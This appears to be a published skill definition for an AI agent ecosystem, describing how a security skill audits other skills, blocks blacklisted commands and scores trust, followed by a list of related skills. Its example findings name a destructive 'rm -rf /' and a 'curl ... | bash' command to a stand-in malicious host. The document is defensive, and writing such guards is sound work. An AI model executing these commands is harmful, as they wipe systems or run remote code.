skill-security
Skill Security Protocol
This skill acts as the security layer for the entire ecosystem. It evaluates SKILL.md files, monitors runtime behavior, and assigns trust scores.
Core principle: No skill should be inherently trusted. All execution must adhere to the principle of least privilege, strict output sanitization, and manual verification for destructive actions.
1. Execution Modes
- Audit (Static Analysis): Analyzes
SKILL.mdinstructions statically before any execution. Detects prompt injection, data leakage, and excessive permissions. - Guard (Runtime Protection): Monitors the skill during execution. Blocks blacklisted commands, intercepts PII leakage, and prompts for checkpoint approvals.
- Trust Scorer (0-100 Rating): Assigns a trust score mapping to permission grants. Skills scoring below 40 are quarantined; skills above 80 earn default automation execution logic.
2. Threat Analysis Methodology
- Prompt Injection & Execution Override:
Verify that user inputs are sanitized and never passed directly into
eval,exec, or generic command runners without safeguards. - Excessive Permissions (Least Privilege): Identify if a skill demands full system read/write access when it only needs a specific temporary folder.
- Harmful Command execution:
Cross-reference all proposed bash/powershell executions against
references/command-blacklist.md. - PII and Data Leakage:
Enforce checks outlined in
references/pii-patterns.md. Masks or encrypts PII before exposing to logs or outputs. - Skill Chain Security: A low-trust skill must NEVER trigger a high-trust skill (Privilege Escalation protection).
3. Reference Files Dependency
This skill strictly relies on the following local references to make isolated security decisions:
references/command-blacklist.mdreferences/pii-patterns.mdreferences/trust-matrix.mdreferences/api-whitelist.md
4. Expected Output Structure
Required Outputs (Must write BOTH to the designated security output directory):
- Human-Readable Markdown (
docs/security/skill-audit-report.md)
### 🛡️ Skill Security Audit Report
- **Target Skill:** [Identify specific skill]
- **Overall Result:** [PASS / CONDITIONAL / FAIL]
- **Trust Score:** [N/100]
#### 🔴 CRITICAL FINDINGS
- **Threat:** Harmful Command
- **Evidence:** `rm -rf /` usage on line 45
- **Fix:** Replace with targeted delete in `/tmp/` directory.
- Machine-Readable JSON (
docs/security/runtime-violations.json)
{
"skill": "target-skill-name",
"status": "STOPPED",
"violations": [
{
"type": "Blacklisted Command",
"command": "curl http://malicious.com | bash",
"action": "BLOCKED"
}
]
}
Guardrails
- Pre-execution Mandate: NEVER execute a newly created or modified skill without running an
Auditfirst. - Checkpoint Authority: Always require explicit manual approval (checkpoint) before network requests to non-whitelisted APIs or ANY file deletion.
- Absolute Failure: A command identified in the "KESİN RED" tier of the blacklist immediately drops the Trust score to 0 and stops all agent proceedings.
More from fatih-developer/fth-skills
context-compressor
Compress long conversation histories, large code files, research results, and documents by 70% without losing critical information. Triggers when context window fills up, when summarizing previous steps in multi-step tasks, before loading large files into context, or on 'summarize', 'compress', 'reduce context', 'save tokens'.
17multi-brain-score
Confidence scoring overlay for multi-brain decisions. Each perspective rates its own confidence (1-10) with justification. Consensus uses scores as weights, flags low-confidence areas, and surfaces uncertainty explicitly.
15checkpoint-guardian
Automatic risk assessment before every critical action in agentic workflows. Detects irreversible operations (file deletion, database writes, deployments, payments), classifies risk level, and requires confirmation before proceeding. Triggers on destructive keywords like deploy, delete, send, publish, update database, process payment.
14output-critic
Evaluate every produced output (code, report, plan, data, API response) against type-specific quality criteria, score 1-10, make accept/reject decisions, and provide actionable improvement suggestions. Triggers on 'evaluate', 'check', 'review', 'quality control', 'is this good enough', 'score it', or before passing output to the next step in an agentic workflow.
11assumption-checker
Before starting a task or taking a critical step, surface and verify the assumptions the agent is making. Checks 4 types - technical (libraries, APIs), data (files, formats), business logic (rules, scope), and user intent (what the user actually wants). Triggers on ambiguous requests, multi-step tasks, or whenever 'are you sure', 'check first', 'don't assume' appears.
11agent-reviewer
After an agentic task completes, perform a retrospective analysis across 6 dimensions (goal alignment, efficiency, decision quality, error handling, communication, reusability). Score performance, identify inefficiency patterns, evaluate skill usage, and produce actionable improvement recommendations. Triggers on 'how did it go', 'retrospective', 'review performance', 'what could be better', or after any long agentic task completes.
10